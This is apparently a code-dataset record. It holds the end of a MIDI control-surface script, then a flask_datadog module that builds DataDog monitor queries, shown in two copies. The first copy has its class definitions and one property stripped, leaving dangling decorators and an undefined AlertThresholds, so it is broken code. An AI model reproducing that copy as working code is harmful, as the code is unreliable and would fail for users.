		if (not display_string):
			return (' ' * NUM_CHARS_PER_DISPLAY_STRIP)
		if ((len(display_string.strip()) > (NUM_CHARS_PER_DISPLAY_STRIP - 1)) and (display_string.endswith('dB') and (display_string.find('.') != -1))):
			display_string = display_string[:-2]
		if (len(display_string) > (NUM_CHARS_PER_DISPLAY_STRIP - 1)):
			for um in [' ',
			 'i',
			 'o',
			 'u',
			 'e',
			 'a']:
				while ((len(display_string) > (NUM_CHARS_PER_DISPLAY_STRIP - 1)) and (display_string.rfind(um, 1) != -1)):
					um_pos = display_string.rfind(um, 1)
					display_string = (display_string[:um_pos] + display_string[(um_pos + 1):])
		else:
			display_string = display_string.center((NUM_CHARS_PER_DISPLAY_STRIP - 1))
		ret = u''
		for i in range((NUM_CHARS_PER_DISPLAY_STRIP - 1)):
			if ((ord(display_string[i]) > 127) or (ord(display_string[i]) < 0)):
				ret += ' '
			else:
				ret += display_string[i]
		ret += ' '
		ret = ret.replace(' ', '_')
		assert (len(ret) == NUM_CHARS_PER_DISPLAY_STRIP)
		return ret
	def notification_to_bridge(self, name, value, sender):
		if isinstance(sender, MonoEncoderElement):
			self._monobridge._send(sender.name, 'lcd_name', str(self.generate_strip_string(name)))
			self._monobridge._send(sender.name, 'lcd_value', str(self.generate_strip_string(value)))
	# touched/check_touch debounce the 'touch' on/off messages: each touch
	# bumps a counter (capped at 5) that decays every 2 ticks; 'off' is sent
	# only when it reaches zero.
	# NOTE(review): `self._touched is 0` relies on CPython small-int
	# interning; `== 0` would be the safe comparison.
	def touched(self):
		if self._touched is 0:
			self._monobridge._send('touch', 'on')
			self.schedule_message(2, self.check_touch)
		self._touched +=1
	def check_touch(self):
		if self._touched > 5:
			self._touched = 5
		elif self._touched > 0:
			self._touched -= 1
		if self._touched is 0:
			self._monobridge._send('touch', 'off')
		else:
			self.schedule_message(2, self.check_touch)
	"""general functionality"""
	def allow_updates(self, allow_updates):
		for component in self.components:
			component.set_allow_update(int(allow_updates!=0))
	def disconnect(self):
		if self._encoder.value_has_listener(self._nav_change):
			self._encoder.remove_value_listener(self._nav_change)
		self.log_message("--------------= Alias log closed =--------------")
		super(Alias, self).disconnect()
		rebuild_sys()
	def handle_sysex(self, midi_bytes):
		pass
	def device_follows_track(self, val):
		self._device_selection_follows_track_selection = (val == 1)
		return self
	def assign_alternate_mappings(self):
		pass
	def _get_num_tracks(self):
		return self.num_tracks
	def _on_device_changed(self, device):
		#self.log_message('new device ' + str(type(device)))
		if self._update_linked_device_selection != None:
			self._update_linked_device_selection(device)
	# NOTE(review): references self._r_function_mode / self._mem /
	# self._session2, none of which are created in __init__ here --
	# presumably leftovers from a sibling script; verify before relying on it.
	def _on_session_offset_changes(self):
		if self._r_function_mode._mode_index in range(0,3):
			self._mem[int(self._r_function_mode._mode_index)] = self._session2.track_offset()
	def connect_script_instances(self, instanciated_scripts):
		pass
# a | 5,917 | 829 | 70 |
82b9eabb76e95d06a5105bb51a2e9d0e4f0c6e98 | 8,575 | py | Python | flask_datadog/generator/datadog_monitor.py | abuhabuh/flask-datadog-monitor | 8edf4872027fe609638a5aa4decb6125a335ae6d | [
"MIT"
] | 1 | 2021-05-26T14:56:30.000Z | 2021-05-26T14:56:30.000Z | flask_datadog/generator/datadog_monitor.py | abuhabuh/flask-datadog | 8edf4872027fe609638a5aa4decb6125a335ae6d | [
"MIT"
] | null | null | null | flask_datadog/generator/datadog_monitor.py | abuhabuh/flask-datadog | 8edf4872027fe609638a5aa4decb6125a335ae6d | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from typing import Optional
from flask_datadog.generator import endpoint_util
from flask_datadog.shared.datadog_constants import \
MonitorType, \
MonitorSpec
@dataclass(frozen=True)
@dataclass(frozen=True)
class DatadogMonitor:
"""Represents a DataDog Monitor"""
# endpoint_path example: /base_test
endpoint_path: str
# method example: GET
method: str
monitor_type: MonitorType
# mon_spec: dictionary of monitor specifications
mon_spec: dict
DEFAULT_ALERT_PERIOD: str = '5m'
# For anomaly monitors: mapping of rollup intervals for aggregation to the
# avg() time period for the anomaly query
ROLLUP_TO_AVG_TIME_MAP = {
7600: '2w',
3600: '1w',
1800: '1w',
600: '2d',
300: '1d',
120: '12h',
60: '4h',
20: '1h',
}
@property
@property
def name(self) -> str:
"""Return name of DataDog monitor name
TODO: make this function customizable by end user.
"""
cleaned_endpoint_path: str = endpoint_util.clean_endpoint_for_naming(
self.endpoint_path,
)
# Use MonitorType.value because we can keep the enum value the same
# while we we maintain flexibility to refactor the enum name in the code
return f'{self.method.upper()}-{cleaned_endpoint_path}_{self.monitor_type.value}'
@property
def resource_name(self) -> str:
"""Datadog format resource name.
Used for `tags` field in terraform spec for a monitor.
"""
return f'{self.method}_{self.endpoint_path.lower()}'.lower()
@property
def terraform_monitor_type(self) -> str:
"""Map the DataDog Monitor to the proper monitor type for Terraform specs.
Different monitor types: https://docs.datadoghq.com/api/latest/monitors/#create-a-monitor
"""
if self.monitor_type in [
MonitorType.APM_ERROR_RATE_THRESHOLD,
MonitorType.APM_LATENCY_THRESHOLD,
MonitorType.APM_ERROR_RATE_ANOMALY,
]:
return 'query alert'
raise DatadogMonitorFormatException(
f'MonitorType [{self.monitor_type}] has no matching terraform monitor type string')
def get_alert_escalation_msg(self) -> str:
"""Return escalation message
TODO: not sure where escalation msg is applicable
"""
return 'Alert escalated'
def get_alert_msg(self) -> str:
"""Return alert msg for monitor
"""
if self.mon_spec.get(MonitorSpec.MSG, ''):
return ' '.join(self.mon_spec[MonitorSpec.MSG].split())
return f"""{self.monitor_type.value} triggered."""
def get_alert_thresholds(self) -> AlertThresholds:
"""Alert thresholds with defaults
"""
critical_threshold: float = self.mon_spec.get(MonitorSpec.CRITICAL_THRESHOLD, None)
critical_recovery: float = self.mon_spec.get(MonitorSpec.CRITICAL_RECOVERY_THRESHOLD, None)
warning_threshold: float = self.mon_spec.get(MonitorSpec.WARNING_THRESHOLD, None)
warning_recovery: float = self.mon_spec.get(MonitorSpec.WARNING_RECOVERY_THRESHOLD, None)
if all(x is None for x in [
critical_recovery,
critical_threshold,
warning_recovery,
warning_threshold]
):
critical_threshold = .1
critical_recovery = .08
warning_threshold = .05
warning_recovery = .03
return AlertThresholds(
critical_threshold=critical_threshold,
critical_recovery=critical_recovery,
warning_threshold=warning_threshold,
warning_recovery=warning_recovery,
)
def get_anomaly_threshold_windows(self) -> dict[str, str]:
"""Return anomaly monitor threshold windows.
Threshold windows match the alert_window.
"""
if self.is_anomaly_monitor():
return {
'recovery_window': f'last_{self.alert_period}',
'trigger_window': f'last_{self.alert_period}',
}
return {}
    def get_query_str(
            self,
            env: str,
            service_name: str,
    ) -> str:
        """Build the DataDog monitor query string for this monitor type.

        :param env: alert env (e.g., 'staging', 'prod')
        :param service_name: name of service (e.g., 'authentication_service')
        :return: whitespace-normalized (single-line) DataDog query string
        :raises DatadogMonitorFormatException: for unsupported monitor types
            or unsupported anomaly rollup intervals.
        """
        at: AlertThresholds = self.get_alert_thresholds()
        # NOTE(review): unlike the resource_name property, this does NOT
        # lowercase endpoint_path -- confirm the asymmetry is intentional.
        resource_name: str = f'{self.method.lower()}_{self.endpoint_path}'
        # flask_req_filter is the common filter to apply to flask request traces
        flask_req_filter: str = f"""
            env:{env},
            service:{service_name},
            resource_name:{resource_name}
        """
        if self.monitor_type == MonitorType.APM_ERROR_RATE_THRESHOLD:
            # Error rate = errors / hits over the alert period.
            query = f"""
                sum(last_{self.alert_period}): (
                    sum:trace.flask.request.errors{{
                        {flask_req_filter}
                    }}.as_count()
                    /
                    sum:trace.flask.request.hits{{
                        {flask_req_filter}
                    }}.as_count()
                ) > {at.critical_threshold}
            """
        elif self.monitor_type == MonitorType.APM_LATENCY_THRESHOLD:
            # Average request latency over the alert period.
            query = f"""
                avg(last_{self.alert_period}):avg:trace.flask.request{{
                    {flask_req_filter}
                }} > {at.critical_threshold}
            """
        elif self.monitor_type == MonitorType.APM_ERROR_RATE_ANOMALY:
            # TODO: only basic supported for now -- other's are 'agile',
            # 'robust' and have more associated configs
            anomaly_algo = 'basic'
            default_deviation_dir = 'both'
            default_num_deviations = 2
            # TODO: map rollup interval to alert_period because possible
            # rollup interval values are conditional on alert_period
            default_rollup_interval_sec = 120
            deviation_dir: str = self.mon_spec.get(
                MonitorSpec.ANOMALY_DEVIATION_DIR, default_deviation_dir)
            anomaly_num_deviations = self.mon_spec.get(
                MonitorSpec.ANOMALY_NUM_DEVIATIONS, default_num_deviations)
            anomaly_rollup_interval_sec = self.mon_spec.get(
                MonitorSpec.ANOMALY_ROLLUP_INTERVAL_SEC, default_rollup_interval_sec)
            if anomaly_rollup_interval_sec not in DatadogMonitor.ROLLUP_TO_AVG_TIME_MAP:
                raise DatadogMonitorFormatException(f'Rollup interval ({anomaly_rollup_interval_sec}) not supported.')
            # The avg() window length is derived from the rollup interval via
            # ROLLUP_TO_AVG_TIME_MAP; the alert_window stays the alert period.
            query = f"""
                avg(last_{DatadogMonitor.ROLLUP_TO_AVG_TIME_MAP[anomaly_rollup_interval_sec]}):anomalies(
                    sum:trace.flask.request.errors{{
                        {flask_req_filter}
                    }}.as_count()
                    /
                    sum:trace.flask.request.hits{{
                        {flask_req_filter}
                    }}.as_count(),
                    '{anomaly_algo}',
                    {anomaly_num_deviations},
                    direction='{deviation_dir}',
                    alert_window='last_{self.alert_period}',
                    interval={anomaly_rollup_interval_sec},
                    count_default_zero='true'
                ) >= {at.critical_threshold}
            """
        else:
            raise DatadogMonitorFormatException(f'Monitor type ({self.monitor_type}) not supported.')
        # Collapse all whitespace runs so the query is emitted as one line.
        return ' '.join(query.split())
def is_anomaly_monitor(self) -> bool:
"""Return whether or not this is an anomaly monitor
"""
return self.monitor_type in MonitorType.anomaly_monitors()
def is_default_monitor(self) -> bool:
"""A monitor is a default monitor if it has no specifications"""
return len(self.mon_spec) == 0
| 36.489362 | 118 | 0.60793 | from dataclasses import dataclass
from typing import Optional
from flask_datadog.generator import endpoint_util
from flask_datadog.shared.datadog_constants import \
MonitorType, \
MonitorSpec
class DatadogMonitorFormatException(Exception):
    """Raised when monitor specs cannot be mapped to a valid DataDog format."""
@dataclass(frozen=True)
class AlertThresholds:
    """Threshold values used to trigger and recover DataDog monitor alerts."""
    # Value at which the monitor alerts; the only required threshold.
    critical_threshold: float
    # Value at which a critical alert recovers.
    critical_recovery: Optional[float] = None
    # Value at which the monitor emits a warning.
    warning_threshold: Optional[float] = None
    # Value at which a warning recovers.
    warning_recovery: Optional[float] = None
@dataclass(frozen=True)
class DatadogMonitor:
    """Represents a DataDog Monitor"""
    # endpoint_path example: /base_test
    endpoint_path: str
    # method example: GET
    method: str
    # Which kind of monitor to generate (error-rate / latency / anomaly).
    monitor_type: MonitorType
    # mon_spec: dictionary of monitor specifications
    mon_spec: dict
    # Evaluation window used when the monitor spec supplies none.
    DEFAULT_ALERT_PERIOD: str = '5m'
    # For anomaly monitors: mapping of rollup intervals for aggregation to the
    # avg() time period for the anomaly query
    # NOTE(review): the 7600 key looks like it may be a typo for 7200
    # (2 hours) -- confirm against the intended rollup intervals.
    # (Deliberately left un-annotated: annotating it would turn it into a
    # dataclass field with a mutable default.)
    ROLLUP_TO_AVG_TIME_MAP = {
        7600: '2w',
        3600: '1w',
        1800: '1w',
        600: '2d',
        300: '1d',
        120: '12h',
        60: '4h',
        20: '1h',
    }

    @property
    def alert_period(self) -> str:
        """Evaluation window for the monitor (e.g. '5m').

        Default (spec-less) monitors fall back to DEFAULT_ALERT_PERIOD;
        any monitor with a spec must declare its own alert period.

        :raises DatadogMonitorFormatException: if a non-default spec omits
            the alert period.
        """
        if self.is_default_monitor():
            return DatadogMonitor.DEFAULT_ALERT_PERIOD
        if not MonitorSpec.ALERT_PERIOD in self.mon_spec:
            raise DatadogMonitorFormatException(f'{MonitorSpec.ALERT_PERIOD} required')
        return self.mon_spec[MonitorSpec.ALERT_PERIOD]

    @property
    def name(self) -> str:
        """Return name of DataDog monitor name
        TODO: make this function customizable by end user.
        """
        cleaned_endpoint_path: str = endpoint_util.clean_endpoint_for_naming(
            self.endpoint_path,
        )
        # Use MonitorType.value because we can keep the enum value the same
        # while we we maintain flexibility to refactor the enum name in the code
        return f'{self.method.upper()}-{cleaned_endpoint_path}_{self.monitor_type.value}'

    @property
    def resource_name(self) -> str:
        """Datadog format resource name.
        Used for `tags` field in terraform spec for a monitor.
        """
        # The trailing .lower() also lowercases the method portion.
        return f'{self.method}_{self.endpoint_path.lower()}'.lower()

    @property
    def terraform_monitor_type(self) -> str:
        """Map the DataDog Monitor to the proper monitor type for Terraform specs.
        Different monitor types: https://docs.datadoghq.com/api/latest/monitors/#create-a-monitor

        :raises DatadogMonitorFormatException: for unsupported monitor types.
        """
        if self.monitor_type in [
            MonitorType.APM_ERROR_RATE_THRESHOLD,
            MonitorType.APM_LATENCY_THRESHOLD,
            MonitorType.APM_ERROR_RATE_ANOMALY,
        ]:
            return 'query alert'
        raise DatadogMonitorFormatException(
            f'MonitorType [{self.monitor_type}] has no matching terraform monitor type string')

    def get_alert_escalation_msg(self) -> str:
        """Return escalation message
        TODO: not sure where escalation msg is applicable
        """
        return 'Alert escalated'

    def get_alert_msg(self) -> str:
        """Return alert msg for monitor

        A message supplied in the monitor spec wins (whitespace collapsed);
        otherwise a default derived from the monitor type is returned.
        """
        if self.mon_spec.get(MonitorSpec.MSG, ''):
            return ' '.join(self.mon_spec[MonitorSpec.MSG].split())
        return f"""{self.monitor_type.value} triggered."""

    def get_alert_thresholds(self) -> AlertThresholds:
        """Alert thresholds with defaults

        If the spec supplies none of the four values, a default set is used.
        """
        # These can each be None when absent from the spec.
        critical_threshold: float = self.mon_spec.get(MonitorSpec.CRITICAL_THRESHOLD, None)
        critical_recovery: float = self.mon_spec.get(MonitorSpec.CRITICAL_RECOVERY_THRESHOLD, None)
        warning_threshold: float = self.mon_spec.get(MonitorSpec.WARNING_THRESHOLD, None)
        warning_recovery: float = self.mon_spec.get(MonitorSpec.WARNING_RECOVERY_THRESHOLD, None)
        if all(x is None for x in [
            critical_recovery,
            critical_threshold,
            warning_recovery,
            warning_threshold]
        ):
            # Nothing configured at all: fall back to default thresholds.
            critical_threshold = .1
            critical_recovery = .08
            warning_threshold = .05
            warning_recovery = .03
        return AlertThresholds(
            critical_threshold=critical_threshold,
            critical_recovery=critical_recovery,
            warning_threshold=warning_threshold,
            warning_recovery=warning_recovery,
        )

    def get_anomaly_threshold_windows(self) -> dict[str, str]:
        """Return anomaly monitor threshold windows.
        Threshold windows match the alert_window.
        Returns an empty dict for non-anomaly monitors.
        """
        if self.is_anomaly_monitor():
            return {
                'recovery_window': f'last_{self.alert_period}',
                'trigger_window': f'last_{self.alert_period}',
            }
        return {}

    def get_query_str(
            self,
            env: str,
            service_name: str,
    ) -> str:
        """Build the DataDog monitor query string for this monitor type.

        :param env: alert env (e.g., 'staging', 'prod')
        :param service_name: name of service (e.g., 'authentication_service')
        :return: whitespace-normalized (single-line) DataDog query string
        :raises DatadogMonitorFormatException: for unsupported monitor types
            or unsupported anomaly rollup intervals.
        """
        at: AlertThresholds = self.get_alert_thresholds()
        # NOTE(review): unlike the resource_name property, this does NOT
        # lowercase endpoint_path -- confirm the asymmetry is intentional.
        resource_name: str = f'{self.method.lower()}_{self.endpoint_path}'
        # flask_req_filter is the common filter to apply to flask request traces
        flask_req_filter: str = f"""
            env:{env},
            service:{service_name},
            resource_name:{resource_name}
        """
        if self.monitor_type == MonitorType.APM_ERROR_RATE_THRESHOLD:
            # Error rate = errors / hits over the alert period.
            query = f"""
                sum(last_{self.alert_period}): (
                    sum:trace.flask.request.errors{{
                        {flask_req_filter}
                    }}.as_count()
                    /
                    sum:trace.flask.request.hits{{
                        {flask_req_filter}
                    }}.as_count()
                ) > {at.critical_threshold}
            """
        elif self.monitor_type == MonitorType.APM_LATENCY_THRESHOLD:
            # Average request latency over the alert period.
            query = f"""
                avg(last_{self.alert_period}):avg:trace.flask.request{{
                    {flask_req_filter}
                }} > {at.critical_threshold}
            """
        elif self.monitor_type == MonitorType.APM_ERROR_RATE_ANOMALY:
            # TODO: only basic supported for now -- other's are 'agile',
            # 'robust' and have more associated configs
            anomaly_algo = 'basic'
            default_deviation_dir = 'both'
            default_num_deviations = 2
            # TODO: map rollup interval to alert_period because possible
            # rollup interval values are conditional on alert_period
            default_rollup_interval_sec = 120
            deviation_dir: str = self.mon_spec.get(
                MonitorSpec.ANOMALY_DEVIATION_DIR, default_deviation_dir)
            anomaly_num_deviations = self.mon_spec.get(
                MonitorSpec.ANOMALY_NUM_DEVIATIONS, default_num_deviations)
            anomaly_rollup_interval_sec = self.mon_spec.get(
                MonitorSpec.ANOMALY_ROLLUP_INTERVAL_SEC, default_rollup_interval_sec)
            if anomaly_rollup_interval_sec not in DatadogMonitor.ROLLUP_TO_AVG_TIME_MAP:
                raise DatadogMonitorFormatException(f'Rollup interval ({anomaly_rollup_interval_sec}) not supported.')
            # The avg() window length is derived from the rollup interval via
            # ROLLUP_TO_AVG_TIME_MAP; the alert_window stays the alert period.
            query = f"""
                avg(last_{DatadogMonitor.ROLLUP_TO_AVG_TIME_MAP[anomaly_rollup_interval_sec]}):anomalies(
                    sum:trace.flask.request.errors{{
                        {flask_req_filter}
                    }}.as_count()
                    /
                    sum:trace.flask.request.hits{{
                        {flask_req_filter}
                    }}.as_count(),
                    '{anomaly_algo}',
                    {anomaly_num_deviations},
                    direction='{deviation_dir}',
                    alert_window='last_{self.alert_period}',
                    interval={anomaly_rollup_interval_sec},
                    count_default_zero='true'
                ) >= {at.critical_threshold}
            """
        else:
            raise DatadogMonitorFormatException(f'Monitor type ({self.monitor_type}) not supported.')
        # Collapse all whitespace runs so the query is emitted as one line.
        return ' '.join(query.split())

    def is_anomaly_monitor(self) -> bool:
        """Return whether or not this is an anomaly monitor
        """
        return self.monitor_type in MonitorType.anomaly_monitors()

    def is_default_monitor(self) -> bool:
        """A monitor is a default monitor if it has no specifications"""
        return len(self.mon_spec) == 0
| 303 | 203 | 71 |